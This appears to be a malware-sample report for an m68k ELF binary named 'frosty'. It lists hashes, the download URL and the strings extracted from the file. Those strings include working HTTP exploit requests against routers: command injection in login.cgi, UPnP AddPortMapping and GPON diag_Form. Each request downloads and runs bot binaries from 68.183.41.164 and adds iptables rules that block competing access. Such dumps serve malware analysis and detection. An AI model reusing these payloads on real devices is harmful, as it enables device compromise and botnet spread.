Sample details: 66a60aef88331209e5d4d49bbb3cedb4 --

Hashes
MD5: 66a60aef88331209e5d4d49bbb3cedb4
SHA1: caabb7a9eadf9a11ff55da24780e721b4bf724b6
SHA256: dc9dab0cf4dfb07265182da61d816390eef5b5bcb875df3221bdaf0e8b1ebb3f
SSDEEP: 768:hLey3zCdfU/7U3uOL450yrCoGYAvDdT6B8U8uXamG9dLmbYZ2zUfG883UUCWM:hL32dC+FRoG9TU1Xa97Lmb+2z588UU3M
Details
File Type: ELF
Yara Hits
Source
http://68.183.41.164/bins/frosty.m68k
Strings
		N^NuNV
N^NuNV
N^NuNV
N^NuNV
 OHWHQHy
,F G1|
,F G1|
,F G1|
,F G1|
,F G1|
,F G1|
fFth C 
Hx+.Hx
fFth D 
fFth C 
N^NuNV
o2$	"D(
<gH IC
~ THx@
N^Nu"/
NuNq o
b(p7 B
$NuNuNV
p7N@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
p@N@-@
N^NuNV
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
pUN@-@
N^NuNV
N^NuNV
pBN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
 @N^NuNuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
HN^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
NqNu"_ <
"	pfN@-@
N^NuNuNV
N^NuNV
N^NuNV
"	plN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
 @N^NuNuNV
p+N@-@
N^NuNuNV
"	prN@-@
N^NuNV
N^NuNV
LN^NuNV
DN^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
 @N^NuNuNV
 @N^NuNuNV
N^NuNuNV
N^NuNV
NqNuNV
0(N^NuNV
p-N@-@
N^NuNV
N^NuNuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuGET /login.cgi?cli=aa%20aa%27;wget%20http://68.183.41.164/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hakai/2.0
POST /UD/?9 HTTP/1.1
User-Agent: SEFA
Content-Type: text/xml
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://68.183.41.164/icy.sh -O - > icy.sh; chmod 777 icy.sh; sh icy.sh; rm icy.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://68.183.41.164/bins/frosty.mips+-O+/tmp/egg;sh+/tmp/egg`&ipv=0
$(/bin/busybox wget -g 68.183.41.164 -l /tmp/.frosty.mips -r /bins/frosty.mips; /bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://68.183.41.164/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://68.183.41.164/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
,9<0=$7
,7gaee
?8"efg
efg`ab
<=gael
75 edfm
5::=1fdef
5::=1fdeg
5::=1fde`
5::=1fdea
5::=1fdeb
?;d"=.,"
?;d509=:
758"=:
2=018efg
0125!8 
'!$$;& 
1$=7&;! 1&
9; ;&;85
91&8=:
93gadd
M$65&6SRS=
M$65&6SRS>B
/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors